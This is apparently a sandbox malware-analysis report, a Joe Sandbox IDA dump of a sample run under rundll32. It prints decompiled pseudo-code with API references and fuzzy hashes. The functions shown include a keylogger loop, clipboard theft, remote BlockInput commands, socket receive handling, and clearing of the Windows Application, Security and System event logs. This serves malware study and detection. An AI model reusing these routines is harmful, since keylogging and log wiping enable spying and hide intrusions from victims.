                                                            0x04637547
                                                            0x0463754a
                                                            0x0463754c
                                                            0x0463754e
                                                            0x04637557
                                                            0x04637557
                                                            0x0463755a
                                                            0x04637560
                                                            0x04637562
                                                            0x04637569
                                                            0x04637569
                                                            0x0463756c
                                                            0x04637570
                                                            0x04637579
                                                            0x0463757f
                                                            0x04637583
                                                            0x04637585
                                                            0x04637586
                                                            0x0463758a
                                                            0x04637590
                                                            0x04637599
                                                            0x0463754c
                                                            0x0463759a
                                                            0x00000000

                                                            APIs
                                                            • OpenClipboard.USER32(00000000), ref: 0463751B
                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 04637527
                                                            • GetClipboardData.USER32(0000000D), ref: 04637534
                                                            • GlobalFix.KERNEL32(00000000), ref: 04637541
                                                            • GlobalSize.KERNEL32(00000000), ref: 04637551
                                                            • GlobalUnWire.KERNEL32(00000000), ref: 04637579
                                                            • CloseClipboard.USER32 ref: 0463759B
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Clipboard$Global$AvailableCloseDataFormatOpenSizeWire
                                                            • String ID:
                                                            • API String ID: 339718915-0
                                                            • Opcode ID: 8a572fd38f7b06cdd890a6d9510010f09cece48ff21e6fdd83caeffe8dddad34
                                                            • Instruction ID: 50eae53324b5b5eaa2085e2b9c49be9d7b139603563c160f85decf801421a7f8
                                                            • Opcode Fuzzy Hash: 8a572fd38f7b06cdd890a6d9510010f09cece48ff21e6fdd83caeffe8dddad34
                                                            • Instruction Fuzzy Hash: F311A9B5640346BBD7186B70AC8CF5A7B6CEF5530AF044469F90A92241FE35EA14C771
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E046374B0(intOrPtr _a4, long _a8) {
                                                            				int _t4;
                                                            				void* _t6;
                                                            				void* _t12;
                                                            
                                                            				_t4 = OpenClipboard(0);
                                                            				if(_t4 == 0) {
                                                            					return _t4;
                                                            				}
                                                            				EmptyClipboard();
                                                            				_t6 = GlobalAlloc(2, _a8);
                                                            				_t12 = _t6;
                                                            				if(_t12 != 0) {
                                                            					GlobalFix(_t12);
                                                            					if(_t6 != 0) {
                                                            						E0465E060(_t6, _a4, _a8);
                                                            						GlobalUnWire(_t12);
                                                            						SetClipboardData(0xd, _t12);
                                                            					}
                                                            				}
                                                            				return CloseClipboard();
                                                            			}






                                                            0x046374b5
                                                            0x046374bd
                                                            0x04637509
                                                            0x04637509
                                                            0x046374c0
                                                            0x046374cb
                                                            0x046374d1
                                                            0x046374d5
                                                            0x046374d8
                                                            0x046374e0
                                                            0x046374e9
                                                            0x046374f2
                                                            0x046374fb
                                                            0x046374fb
                                                            0x046374e0
                                                            0x00000000

                                                            APIs
                                                            • OpenClipboard.USER32(00000000), ref: 046374B5
                                                            • EmptyClipboard.USER32 ref: 046374C0
                                                            • GlobalAlloc.KERNEL32(00000002,?,?,?,04636D8A,?,?), ref: 046374CB
                                                            • GlobalFix.KERNEL32(00000000), ref: 046374D8
                                                            • GlobalUnWire.KERNEL32(00000000), ref: 046374F2
                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 046374FB
                                                            • CloseClipboard.USER32 ref: 04637501
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Clipboard$Global$AllocCloseDataEmptyOpenWire
                                                            • String ID:
                                                            • API String ID: 2050416147-0
                                                            • Opcode ID: 6ebfc391bd23db6ecf04dbf0759fe71201eb98d6c72ac6cd827dc26bd47b1c18
                                                            • Instruction ID: 0a70271849705e5052acac67be4309386d66eaa5a584b7fd3f79b1abc1ee0efa
                                                            • Opcode Fuzzy Hash: 6ebfc391bd23db6ecf04dbf0759fe71201eb98d6c72ac6cd827dc26bd47b1c18
                                                            • Instruction Fuzzy Hash: 0FF01232581214EBDB1A2FA0AC0DB9F3B1CEF1476BF049010FA0595155FF399A209BA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E04643750(void* __ebx, short* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				intOrPtr _v32;
                                                            				struct _SERVICE_STATUS _v36;
                                                            				signed int _t5;
                                                            				void* _t17;
                                                            				short* _t23;
                                                            				void* _t24;
                                                            				signed int _t27;
                                                            
                                                            				_t5 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t5 ^ _t27;
                                                            				_t23 = __ecx;
                                                            				_t17 = OpenSCManagerW(0, 0, 0xf003f);
                                                            				if(_t17 != 0) {
                                                            					_t24 = OpenServiceW(_t17, _t23, 0x14);
                                                            					if(_t24 != 0) {
                                                            						if(QueryServiceStatus(_t24,  &_v36) != 0) {
                                                            							if(_v32 != 4) {
                                                            								StartServiceW(_t24, 0, 0);
                                                            								_t26 =  !=  ? 1 : 0;
                                                            							}
                                                            						}
                                                            						CloseServiceHandle(_t24);
                                                            					}
                                                            					CloseServiceHandle(_t17);
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t27);
                                                            			}











                                                            0x04643756
                                                            0x0464375d
                                                            0x0464376a
                                                            0x04643774
                                                            0x04643778
                                                            0x04643784
                                                            0x04643788
                                                            0x04643797
                                                            0x0464379d
                                                            0x046437ab
                                                            0x046437b8
                                                            0x046437b8
                                                            0x0464379d
                                                            0x046437bc
                                                            0x046437bc
                                                            0x046437c3
                                                            0x046437c3
                                                            0x046437db

                                                            APIs
                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 0464376E
                                                            • OpenServiceW.ADVAPI32(00000000,?,00000014), ref: 0464377E
                                                            • QueryServiceStatus.ADVAPI32(00000000,?), ref: 0464378F
                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 046437AB
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 046437BC
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 046437C3
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseHandleOpen$ManagerQueryStartStatus
                                                            • String ID:
                                                            • API String ID: 2710452061-0
                                                            • Opcode ID: 36f063ef6d905b83b12fd3e1a3edc3d0bdd284b2994c8516fe50ec976b0c3b79
                                                            • Instruction ID: b49ce2a2ba8c0bc574afe324a70e2e7a1b1ade4357f868e3147a1cc54ce43feb
                                                            • Opcode Fuzzy Hash: 36f063ef6d905b83b12fd3e1a3edc3d0bdd284b2994c8516fe50ec976b0c3b79
                                                            • Instruction Fuzzy Hash: 6A019272701214ABEB245B759C8CF7B7ABCEB85B51F01102DFD06D2342FE68EC4586A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 60%
                                                            			E04641D40(void* __ecx, void* __esi, signed char* _a4, signed int _a8) {
                                                            				void* _t23;
                                                            
                                                            				_t23 = ( *_a4 & 0x000000ff) + 0xffffffeb;
                                                            				if(_t23 > 0x63) {
                                                            					L13:
                                                            					return _t23;
                                                            				} else {
                                                            					switch( *((intOrPtr*)(( *(_t23 + 0x4641e6c) & 0x000000ff) * 4 +  &M04641E3C))) {
                                                            						case 0:
                                                            							__eax =  *(__ebx + 1) & 0x000000ff;
                                                            							return E04641C30(__ecx,  *(__ebx + 1) & 0x000000ff);
                                                            							goto L14;
                                                            						case 1:
                                                            							__al =  *(__ebx + 1);
                                                            							 *(__edi + 0x18) = __al;
                                                            							__al & 0x000000ff =  *(__edi + 0xb0);
                                                            							__eax =  *(__edi + 0xb0) + 4;
                                                            							__eflags = __eax;
                                                            							return __eax;
                                                            							goto L14;
                                                            						case 2:
                                                            							return E046456E0();
                                                            							goto L14;
                                                            						case 3:
                                                            							_push(0);
                                                            							__imp__BlockInput();
                                                            							__eax = _a8;
                                                            							__ecx = __edi;
                                                            							__eax = _a8 - 1;
                                                            							__eflags = _a8 - 1;
                                                            							__eax = __ebx + 1;
                                                            							__eax = E04642090(__ebx, __edi, __ebx + 1, __ebx + 1);
                                                            							_push( *(__edi + 0x10));
                                                            							__imp__BlockInput();
                                                            							return __eax;
                                                            							goto L14;
                                                            						case 4:
                                                            							__eax =  *(__ebx + 1) & 0x000000ff;
                                                            							_push(__eax);
                                                            							 *(__edi + 0x10) = __eax;
                                                            							__imp__BlockInput();
                                                            							return __eax;
                                                            							goto L14;
                                                            						case 5:
                                                            							__eax =  *(__ebx + 1) & 0x000000ff;
                                                            							 *(__edi + 0x14) = __eax;
                                                            							return __eax;
                                                            							goto L14;
                                                            						case 6:
                                                            							__eax =  *(__ebx + 1) & 0x000000ff;
                                                            							__ecx =  *(__edi + 0xb0);
                                                            							 *(__edi + 0x1c) =  *(__ebx + 1) & 0x000000ff;
                                                            							return E046429E0( *(__edi + 0xb0),  *(__ebx + 1) & 0x000000ff);
                                                            							goto L14;
                                                            						case 7:
                                                            							return E04637510(__ecx);
                                                            							goto L14;
                                                            						case 8:
                                                            							_a8 = _a8 - 1;
                                                            							__eflags = _a8 - 1;
                                                            							__eax = __ebx + 1;
                                                            							return E046374B0(__ebx + 1, __ebx + 1);
                                                            							goto L14;
                                                            						case 9:
                                                            							return SetEvent( *(__ecx + 8));
                                                            							goto L14;
                                                            						case 0xa:
                                                            							return E04641FE0(__ecx, __esi, __eflags);
                                                            						case 0xb:
                                                            							goto L13;
                                                            					}
                                                            				}
                                                            				L14:
                                                            			}




                                                            0x04641d4d
                                                            0x04641d53
                                                            0x04641e39
                                                            0x04641e39
                                                            0x04641d59
                                                            0x04641d60
                                                            0x00000000
                                                            0x04641d76
                                                            0x04641d83
                                                            0x00000000
                                                            0x00000000
                                                            0x04641d86
                                                            0x04641d89
                                                            0x04641d90
                                                            0x04641d96
                                                            0x04641d96
                                                            0x04641da3
                                                            0x00000000
                                                            0x00000000
                                                            0x04641dae
                                                            0x00000000
                                                            0x00000000
                                                            0x04641db1
                                                            0x04641db3
                                                            0x04641db9
                                                            0x04641dbc
                                                            0x04641dbe
                                                            0x04641dbe
                                                            0x04641dc0
                                                            0x04641dc4
                                                            0x04641dc9
                                                            0x04641dcc
                                                            0x04641dd5
                                                            0x00000000
                                                            0x00000000
                                                            0x04641dd8
                                                            0x04641ddc
                                                            0x04641ddd
                                                            0x04641de0
                                                            0x04641de9
                                                            0x00000000
                                                            0x00000000
                                                            0x04641dec
                                                            0x04641df0
                                                            0x04641df6
                                                            0x00000000
                                                            0x00000000
                                                            0x04641df9
                                                            0x04641dfd
                                                            0x04641e04
                                                            0x04641e0f
                                                            0x00000000
                                                            0x00000000
                                                            0x04641e1a
                                                            0x00000000
                                                            0x00000000
                                                            0x04641e20
                                                            0x04641e20
                                                            0x04641e22
                                                            0x04641e2e
                                                            0x00000000
                                                            0x00000000
                                                            0x04641d73
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04641d60
                                                            0x00000000

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: BlockInput$EventExchangeInterlocked
                                                            • String ID:
                                                            • API String ID: 2024910948-0
                                                            • Opcode ID: 18bea0c779e737a144fd18be5c2d7eda151a9a903009798b26f7214c3e2b1327
                                                            • Instruction ID: 97f35312afd1174b088c7f0c26a7df821db766a56cc8c286b70c13e9dd7109a5
                                                            • Opcode Fuzzy Hash: 18bea0c779e737a144fd18be5c2d7eda151a9a903009798b26f7214c3e2b1327
                                                            • Instruction Fuzzy Hash: E5210A7B208248DFDB009FA6F884E6DFB68FBD42367048267F608CA501D626E571D774
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • htons.WS2_32(?), ref: 0464DBDE
                                                            • bind.WS2_32(?,00000002,0000001C), ref: 0464DC02
                                                            • bind.WS2_32(?,?,00000010), ref: 0464DC42
                                                            • InterlockedIncrement.KERNEL32(04687B58), ref: 0464DC6C
                                                            • InterlockedIncrement.KERNEL32(04687B58), ref: 0464DC77
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: IncrementInterlockedbind$htons
                                                            • String ID:
                                                            • API String ID: 1901664375-0
                                                            • Opcode ID: 2d4594ac296ec77dc40be0ca24cc5816998180f0b8f23a319efb7be3729571f7
                                                            • Instruction ID: 9151ce3d655358aca5fdff24e11bb2b98b08b6bebbdce5661611cfbecf9f539f
                                                            • Opcode Fuzzy Hash: 2d4594ac296ec77dc40be0ca24cc5816998180f0b8f23a319efb7be3729571f7
                                                            • Instruction Fuzzy Hash: E2318172E001189BDF14EF6CE8859EEB3A5FF99310B01526EEC1597290FBB4AD909790
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E0463B840() {
                                                            				signed int _t25;
                                                            				intOrPtr _t27;
                                                            				void* _t30;
                                                            				void* _t32;
                                                            				void* _t33;
                                                            
                                                            				_push(_t25);
                                                            				_t30 = GetAsyncKeyState;
                                                            				while(1) {
                                                            					Sleep(5);
                                                            					_t32 = 0;
                                                            					asm("o16 nop [eax+eax]");
                                                            					do {
                                                            						_t1 = _t32 + 0x4684768; // 0x30
                                                            						if((GetAsyncKeyState( *_t1 & 0x0000ffff) & 0x00000001) != 0) {
                                                            							_t25 = _t25 & 0xffffff00 | GetKeyState(0x10) < 0x00000000;
                                                            							if((GetKeyState(0x14) & 0xffffff00 | _t22 > 0x00000000) == 0) {
                                                            								if(_t25 == 0) {
                                                            									_t11 = _t32 + 0x468476c; // 0x467e674
                                                            									_t27 =  *_t11;
                                                            								} else {
                                                            									_t10 = _t32 + 0x4684770; // 0x467e76c
                                                            									_t27 =  *_t10;
                                                            								}
                                                            							} else {
                                                            								if(_t25 == 0) {
                                                            									_t9 = _t32 + 0x4684774; // 0x467e674
                                                            									_t27 =  *_t9;
                                                            								} else {
                                                            									_t8 = _t32 + 0x4684778; // 0x467e76c
                                                            									_t27 =  *_t8;
                                                            								}
                                                            							}
                                                            							E0463B2E0(_t25, _t27, _t30, _t32);
                                                            						}
                                                            						_t32 = _t32 + 0x14;
                                                            					} while (_t32 < 0x3ac);
                                                            					_t33 = 0;
                                                            					do {
                                                            						_t12 = _t33 + 0x4684b18; // 0x8
                                                            						if((GetAsyncKeyState( *_t12 & 0x0000ffff) & 0x00000001) != 0) {
                                                            							_t15 = _t33 + 0x4684b1c; // 0x467e508
                                                            							E0463B2E0(_t25,  *_t15, _t30, _t33);
                                                            						}
                                                            						_t33 = _t33 + 8;
                                                            					} while (_t33 < 0x1c0);
                                                            				}
                                                            			}








                                                            0x0463b847
                                                            0x0463b84a
                                                            0x0463b850
                                                            0x0463b852
                                                            0x0463b858
                                                            0x0463b85a
                                                            0x0463b860
                                                            0x0463b860
                                                            0x0463b86c
                                                            0x0463b87b
                                                            0x0463b88c
                                                            0x0463b8a4
                                                            0x0463b8ae
                                                            0x0463b8ae
                                                            0x0463b8a6
                                                            0x0463b8a6
                                                            0x0463b8a6
                                                            0x0463b8a6
                                                            0x0463b88e
                                                            0x0463b890
                                                            0x0463b89a
                                                            0x0463b89a
                                                            0x0463b892
                                                            0x0463b892
                                                            0x0463b892
                                                            0x0463b892
                                                            0x0463b890
                                                            0x0463b8b4
                                                            0x0463b8b4
                                                            0x0463b8b9
                                                            0x0463b8bc
                                                            0x0463b8c4
                                                            0x0463b8c6
                                                            0x0463b8c6
                                                            0x0463b8d2
                                                            0x0463b8d4
                                                            0x0463b8da
                                                            0x0463b8da
                                                            0x0463b8df
                                                            0x0463b8e2
                                                            0x0463b8ea

                                                            APIs
                                                            • Sleep.KERNEL32(00000005), ref: 0463B852
                                                            • GetAsyncKeyState.USER32(00000030), ref: 0463B868
                                                            • GetKeyState.USER32(00000010), ref: 0463B870
                                                            • GetKeyState.USER32(00000014), ref: 0463B87E
                                                            • GetAsyncKeyState.USER32(00000008), ref: 0463B8CE
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: State$Async$Sleep
                                                            • String ID:
                                                            • API String ID: 1722988271-0
                                                            • Opcode ID: fff270bd6c3de663794a9d850938976658e11664254a53c644ac178bf6249d27
                                                            • Instruction ID: 2021cb8926172e473f853566a12cd05146a8e60fc570803da59cee38dc8a0da2
                                                            • Opcode Fuzzy Hash: fff270bd6c3de663794a9d850938976658e11664254a53c644ac178bf6249d27
                                                            • Instruction Fuzzy Hash: 66110832A40385C6E7249764D809AF6B3A8EF81F46B0A061CEAD6173D2FF347C02D764
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 56%
                                                            			E046357F0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				char _v12;
                                                            				void* _v15;
                                                            				intOrPtr _v19;
                                                            				char _v20;
                                                            				struct _WIN32_FIND_DATAW _v612;
                                                            				long _v616;
                                                            				signed int _t20;
                                                            				void* _t23;
                                                            				WCHAR* _t24;
                                                            				void* _t27;
                                                            				void* _t34;
                                                            				void* _t35;
                                                            				void* _t37;
                                                            				void* _t40;
                                                            				WCHAR* _t45;
                                                            				long _t47;
                                                            				long _t48;
                                                            				signed int _t49;
                                                            
                                                            				_t20 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t20 ^ _t49;
                                                            				_t37 = __ecx;
                                                            				_t47 =  *(__ecx + 0x14);
                                                            				_t23 = _t47 - 2;
                                                            				if(_t23 == 0) {
                                                            					_t47 = 1;
                                                            				} else {
                                                            					_t34 = _t23 - 2;
                                                            					if(_t34 == 0) {
                                                            						_t47 = 3;
                                                            					} else {
                                                            						_t35 = _t34 - 2;
                                                            						if(_t35 == 0) {
                                                            							_t47 = _t35 + 5;
                                                            						}
                                                            					}
                                                            				}
                                                            				_t45 = _t37 + 0x18;
                                                            				if( *((intOrPtr*)(_t37 + 0x2c)) < 8) {
                                                            					_t24 = _t45;
                                                            				} else {
                                                            					_t24 =  *_t45;
                                                            				}
                                                            				_t40 = FindFirstFileW(_t24,  &_v612);
                                                            				_v12 = 0;
                                                            				asm("xorps xmm0, xmm0");
                                                            				asm("movq [ebp-0x10], xmm0");
                                                            				_v20 = 0x71;
                                                            				if(_t40 == 0xffffffff) {
                                                            					L16:
                                                            					_t48 = 2;
                                                            					asm("movq [ebp-0xf], xmm0");
                                                            				} else {
                                                            					if(_t47 != 1) {
                                                            						if(_t47 == 3) {
                                                            							goto L16;
                                                            						}
                                                            						if(_t47 != 5) {
                                                            							_t48 = _v616;
                                                            						} else {
                                                            							_v15 = 0xffffffff;
                                                            							_t48 = 3;
                                                            						}
                                                            						L17:
                                                            						FindClose(_t40);
                                                            						if(_t45[0xa] >= 8) {
                                                            							_t45 =  *_t45;
                                                            						}
                                                            						_t27 = CreateFileW(_t45, 0x40000000, 2, 0, _t48, 0x80, 0);
                                                            						if(_t27 != 0xffffffff) {
                                                            							CloseHandle(_t27);
                                                            						} else {
                                                            							_v15 = _t27;
                                                            						}
                                                            						_push(_t40);
                                                            						_push(0x3f);
                                                            						_push(9);
                                                            						E04631C60( *((intOrPtr*)(_t37 + 4)));
                                                            						return E04655AFE(_v8 ^ _t49,  &_v20);
                                                            					}
                                                            					_t48 = 3;
                                                            					_v19 = _v612.nFileSizeHigh;
                                                            					_v15 = _v612.nFileSizeLow;
                                                            				}
                                                            			}






















                                                            0x046357f9
                                                            0x04635800
                                                            0x04635804
                                                            0x04635808
                                                            0x0463580d
                                                            0x04635810
                                                            0x04635828
                                                            0x04635812
                                                            0x04635812
                                                            0x04635815
                                                            0x04635821
                                                            0x04635817
                                                            0x04635817
                                                            0x0463581a
                                                            0x0463581c
                                                            0x0463581c
                                                            0x0463581a
                                                            0x04635815
                                                            0x04635831
                                                            0x04635834
                                                            0x0463583a
                                                            0x04635836
                                                            0x04635836
                                                            0x04635836
                                                            0x0463584a
                                                            0x0463584c
                                                            0x04635850
                                                            0x04635853
                                                            0x04635858
                                                            0x0463585f
                                                            0x0463589f
                                                            0x0463589f
                                                            0x046358a4
                                                            0x04635861
                                                            0x04635864
                                                            0x04635882
                                                            0x00000000
                                                            0x00000000
                                                            0x04635887
                                                            0x04635897
                                                            0x04635889
                                                            0x04635889
                                                            0x04635890
                                                            0x04635890
                                                            0x046358a9
                                                            0x046358aa
                                                            0x046358b4
                                                            0x046358b6
                                                            0x046358b6
                                                            0x046358ca
                                                            0x046358d3
                                                            0x046358db
                                                            0x046358d5
                                                            0x046358d5
                                                            0x046358d5
                                                            0x046358e1
                                                            0x046358e8
                                                            0x046358ea
                                                            0x046358ed
                                                            0x04635902
                                                            0x04635902
                                                            0x0463586c
                                                            0x04635871
                                                            0x0463587a
                                                            0x0463587a

                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 04635844
                                                            • FindClose.KERNEL32(00000000,?,00000000), ref: 046358AA
                                                            • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,?,00000000), ref: 046358CA
                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 046358DB
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseFileFind$CreateFirstHandle
                                                            • String ID:
                                                            • API String ID: 3283578348-0
                                                            • Opcode ID: b528082a4d67e51dbae759062c7ff570c65b2eabeae6a40229049a0e7c5fd68f
                                                            • Instruction ID: cbff6afb9ed74a06381ae48266b8ac3e69aeca6b07aaa4c021cbdd25c390ff30
                                                            • Opcode Fuzzy Hash: b528082a4d67e51dbae759062c7ff570c65b2eabeae6a40229049a0e7c5fd68f
                                                            • Instruction Fuzzy Hash: F331C671E002A4FBDB249E68DC497A9B774EF05321F150A99E51BA7280F770BD81CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 43%
                                                            			E0464F540(intOrPtr* __ecx) {
                                                            				long _t17;
                                                            				intOrPtr* _t23;
                                                            				long _t28;
                                                            				intOrPtr* _t29;
                                                            
                                                            				_t29 = __ecx;
                                                            				if( *((intOrPtr*)(__ecx + 0x184)) != 0) {
                                                            					L12:
                                                            					return 1;
                                                            				} else {
                                                            					_t23 = __imp__#16;
                                                            					do {
                                                            						_t17 =  *_t23( *((intOrPtr*)(_t29 + 0x1c)),  *((intOrPtr*)(_t29 + 0x5c)),  *((intOrPtr*)(_t29 + 0x2c)), 0);
                                                            						_t28 = _t17;
                                                            						if(_t28 <= 0) {
                                                            							if(_t28 == 0xffffffff) {
                                                            								__imp__#111();
                                                            								if(_t17 != 0x2733) {
                                                            									goto L5;
                                                            								} else {
                                                            									goto L12;
                                                            								}
                                                            							} else {
                                                            								if(_t28 == 0) {
                                                            									 *((intOrPtr*)(_t29 + 0xc)) = 1;
                                                            									 *((intOrPtr*)(_t29 + 0x10)) = 5;
                                                            									 *(_t29 + 0x14) = 0;
                                                            									 *((intOrPtr*)(_t29 + 0x18)) = 1;
                                                            									return 0;
                                                            								} else {
                                                            									goto L8;
                                                            								}
                                                            							}
                                                            						} else {
                                                            							SetLastError(0);
                                                            							_push(_t28);
                                                            							_push( *((intOrPtr*)(_t29 + 0x5c)));
                                                            							if( *((intOrPtr*)( *_t29 + 0x8c))() != 2) {
                                                            								goto L8;
                                                            							} else {
                                                            								_t17 =  ==  ? 0x4c7 : GetLastError();
                                                            								L5:
                                                            								 *((intOrPtr*)(_t29 + 0xc)) = 1;
                                                            								 *((intOrPtr*)(_t29 + 0x10)) = 4;
                                                            								 *(_t29 + 0x14) = _t17;
                                                            								 *((intOrPtr*)(_t29 + 0x18)) = 1;
                                                            								return 0;
                                                            							}
                                                            						}
                                                            						goto L13;
                                                            						L8:
                                                            					} while ( *((intOrPtr*)(_t29 + 0x184)) == 0);
                                                            					return 1;
                                                            				}
                                                            				L13:
                                                            			}







                                                            0x0464f542
                                                            0x0464f54c
                                                            0x0464f600
                                                            0x0464f606
                                                            0x0464f552
                                                            0x0464f552
                                                            0x0464f558
                                                            0x0464f563
                                                            0x0464f565
                                                            0x0464f569
                                                            0x0464f5b7
                                                            0x0464f5f1
                                                            0x0464f5fc
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464f5b9
                                                            0x0464f5bb
                                                            0x0464f5d0
                                                            0x0464f5d9
                                                            0x0464f5e0
                                                            0x0464f5e7
                                                            0x0464f5f0
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464f5bb
                                                            0x0464f56b
                                                            0x0464f56d
                                                            0x0464f577
                                                            0x0464f578
                                                            0x0464f584
                                                            0x00000000
                                                            0x0464f586
                                                            0x0464f593
                                                            0x0464f596
                                                            0x0464f596
                                                            0x0464f59d
                                                            0x0464f5a4
                                                            0x0464f5aa
                                                            0x0464f5b3
                                                            0x0464f5b3
                                                            0x0464f584
                                                            0x00000000
                                                            0x0464f5bd
                                                            0x0464f5bd
                                                            0x0464f5ce
                                                            0x0464f5ce
                                                            0x00000000

                                                            APIs
                                                            • recv.WS2_32(?,?,?,00000000), ref: 0464F563
                                                            • SetLastError.KERNEL32(00000000), ref: 0464F56D
                                                            • GetLastError.KERNEL32 ref: 0464F586
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$recv
                                                            • String ID:
                                                            • API String ID: 316788870-0
                                                            • Opcode ID: 56309cf4f018c533b4005660ebe63600839bf8cf930f82004a81c72407b633e2
                                                            • Instruction ID: 90a1f5fb7696b4d9ef8683d7041060b5a673b61cf472ef0bdf568b89c90b53ea
                                                            • Opcode Fuzzy Hash: 56309cf4f018c533b4005660ebe63600839bf8cf930f82004a81c72407b633e2
                                                            • Instruction Fuzzy Hash: 1A1196722017009FEB388F5DD448757B7F1EB94325F10492EE146C6290DBB9E8459B50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 82%
                                                            			E0463A010(void* __ebx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				char* _v12;
                                                            				char* _v16;
                                                            				char* _v20;
                                                            				signed int _t9;
                                                            				void* _t20;
                                                            				signed int _t22;
                                                            				signed int _t23;
                                                            
                                                            				_t9 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t9 ^ _t23;
                                                            				_v20 = "Application";
                                                            				_t22 = 0;
                                                            				_v16 = "Security";
                                                            				_v12 = "System";
                                                            				do {
                                                            					_t20 = OpenEventLogA(0,  *(_t23 + _t22 * 4 - 0x10));
                                                            					if(_t20 != 0) {
                                                            						ClearEventLogW(_t20, 0);
                                                            						CloseEventLog(_t20);
                                                            					}
                                                            					_t22 = _t22 + 1;
                                                            				} while (_t22 < 3);
                                                            				return E04655AFE(_v8 ^ _t23);
                                                            			}











                                                            0x0463a016
                                                            0x0463a01d
                                                            0x0463a029
                                                            0x0463a030
                                                            0x0463a032
                                                            0x0463a039
                                                            0x0463a040
                                                            0x0463a04c
                                                            0x0463a050
                                                            0x0463a055
                                                            0x0463a058
                                                            0x0463a058
                                                            0x0463a05e
                                                            0x0463a05f
                                                            0x0463a074

                                                            APIs
